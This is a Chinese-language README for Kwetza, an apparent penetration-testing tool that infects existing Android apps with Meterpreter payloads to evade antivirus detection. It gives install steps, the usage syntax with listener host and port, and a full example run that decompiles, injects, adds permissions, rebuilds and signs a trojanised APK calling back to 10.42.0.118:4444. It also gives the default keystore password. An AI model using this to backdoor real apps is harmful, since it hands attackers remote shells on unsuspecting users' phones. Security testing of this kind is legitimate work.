作者:Chris Le Roy (@brompwnie) [email protected]
Kwetza 是一款允许你用 Meterpreter 载荷感染现有 Android 应用程序的工具。
Kwetza 使用自定义或默认的载荷模板感染现有的 Android 应用程序,以规避防病毒软件的检测。Kwetza 允许你使用目标应用程序的默认权限感染 Android 应用程序,或注入额外权限以获得更多功能。
Kwetza 所自动化的手动步骤可在此处找到:https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
首先获取代码:
git clone https://github.com/sensepost/kwetza.git
Kwetza 使用 Python 编写,需要 BeautifulSoup,可通过 Pip 安装:
pip install beautifulsoup4
Kwetza 需要安装 Apktool 并使其可通过你的 PATH 访问。安装说明可在此处找到:https://ibotpeaches.github.io/Apktool/install
python kwetza.py 要感染的Apk名称.apk https/tcp LHOST LPORT yes/no 自定义类名
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza 已开发为兼容 Python 2。
Kwetza 默认使用位于 "payload" 文件夹中的模板和密钥库来注入和签名感染后的 apk。
如果你想用自己的证书签名感染的应用程序,请生成一个新的密钥库,将其放在 "payload" 文件夹中,并重命名为现有的密钥库,或者更改 kwetza.py 中的引用。
载荷模板也可进行相同操作。
默认密钥库的密码就是 "password"。
Kwetza 根据知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 (http://creativecommons.org/licenses/by-nc-sa/4.0) 进行许可。
超出本许可范围的权限可在 http://sensepost.com/contact 获取。